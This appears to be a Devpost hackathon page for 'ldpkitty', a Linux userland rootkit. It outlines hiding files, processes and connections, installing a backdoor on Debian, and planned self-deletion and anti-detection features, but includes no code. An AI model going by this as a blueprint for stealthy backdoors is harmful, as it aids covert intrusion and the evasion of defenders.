ldpkitty

Inspiration

@r00tkillah "Horse Pill: A New Type of Linux Rootkit" @ Blackhat. Jynx2, vlany & Azazel.

What it does

Hides files, processes, network connections. Relies on root access, install a backdoor into a Debian system.

How we built it

Between two virtual machines, one for development, one for testing.

Challenges we ran into

Many unrecoverable system crashes. Didn't find a way to debug hooked system calls. Spent a lot of time rebooting & restoring virtual machines.

Accomplishments that we're proud of

Fairly robust.

What we learned

Dynamic and static libraries. Process permissions. Network management. Fundamental syscalls & functions in Linux. Constructors & destructors. Using Github.

What's next for ldpkitty

OpenSSL encryption. Decrease memory footprint. Suicide script to self-delete & overwrite memory. Two-prong trigger for backdoor connection. Research detection methods & implement countermeasures.

Built With

Updates

Black bird started this project — Feb 13, 2022 06:44 AM EST

Leave feedback in the comments!

Log in or sign up for Devpost to join the conversation.